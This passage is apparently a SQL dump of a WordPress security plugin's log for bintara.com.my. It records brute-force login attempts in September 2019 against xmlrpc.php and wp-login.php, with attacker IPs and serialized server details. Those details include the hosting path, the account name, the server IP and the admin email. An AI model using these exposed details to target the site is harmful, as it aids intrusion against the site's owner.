ozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"45098\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7JotRCUhS5Yos@KbVdawAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567541666.1035\";s:12:\"REQUEST_TIME\";s:10:\"1567541666\";}}','notice','2019-09-03 20:14:27','2019-09-03 20:14:26',18203088,19499536,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.36.222'),(23649,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"44698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7Jn7mh4I5iAnitdxgvbAAAAQ4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567541663.3159\";s:12:\"REQUEST_TIME\";s:10:\"1567541663\";}}','notice','2019-09-03 20:14:24','2019-09-03 20:14:23',17683792,19174824,'https://bintara.com.my/wp-login.php',1,0,'166.62.36.222'),(23648,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-03 20:11:36','2019-09-03 20:11:34',17651104,18114744,'http://www.bintara.com.my/',1,0,'46.165.203.45'),(23647,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.212.224.68\";s:11:\"REMOTE_PORT\";s:5:\"56296\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7FoLmh4I5iAnitdxguHQAAAQg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567540640.6592\";s:12:\"REQUEST_TIME\";s:10:\"1567540640\";}}','notice','2019-09-03 19:57:22','2019-09-03 19:57:21',18202744,19502096,'https://bintara.com.my/xmlrpc.php',1,0,'173.212.224.68'),(23646,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.212.224.68\";s:11:\"REMOTE_PORT\";s:5:\"55730\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7Fnbmh4I5iAnitdxguGgAAAQQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567540637.4173\";s:12:\"REQUEST_TIME\";s:10:\"1567540637\";}}','notice','2019-09-03 19:57:19','2019-09-03 19:57:17',17850312,19177088,'https://bintara.com.my/wp-login.php',1,0,'173.212.224.68'),(23645,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.212.224.68\";s:11:\"REMOTE_PORT\";s:5:\"55730\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7Fnbmh4I5iAnitdxguGgAAAQQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567540637.4173\";s:12:\"REQUEST_TIME\";s:10:\"1567540637\";}}','notice','2019-09-03 19:57:18','2019-09-03 19:57:17',17688848,19177088,'https://bintara.com.my/wp-login.php',1,0,'173.212.224.68'),(23644,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.50.204\";s:11:\"REMOTE_PORT\";s:5:\"33760\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7A31pDwFftl9khPl3CVgAAABY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567539423.6003\";s:12:\"REQUEST_TIME\";s:10:\"1567539423\";}}','notice','2019-09-03 19:37:05','2019-09-03 19:37:04',18202536,19501384,'https://bintara.com.my/xmlrpc.php',1,0,'171.244.50.204'),(23643,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.50.204\";s:11:\"REMOTE_PORT\";s:5:\"33322\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7A3NRCUhS5Yos@KbVdAgAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567539420.9775\";s:12:\"REQUEST_TIME\";s:10:\"1567539420\";}}','notice','2019-09-03 19:37:02','2019-09-03 19:37:01',17684184,19175416,'https://bintara.com.my/wp-login.php',1,0,'171.244.50.204'),(23642,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"52.88.244.233\";s:11:\"REMOTE_PORT\";s:5:\"51340\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW61NLmh4I5iAnitdxgnhAAAARM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567536436.3103\";s:12:\"REQUEST_TIME\";s:10:\"1567536436\";}}','notice','2019-09-03 18:47:17','2019-09-03 18:47:16',18202344,19501464,'https://bintara.com.my/xmlrpc.php',1,0,'52.88.244.233'),(23641,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"52.88.244.233\";s:11:\"REMOTE_PORT\";s:5:\"51020\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW61Mbmh4I5iAnitdxgngwAAARc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567536433.3307\";s:12:\"REQUEST_TIME\";s:10:\"1567536433\";}}','notice','2019-09-03 18:47:14','2019-09-03 18:47:13',17684568,19175976,'https://bintara.com.my/wp-login.php',1,0,'52.88.244.233'),(23640,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP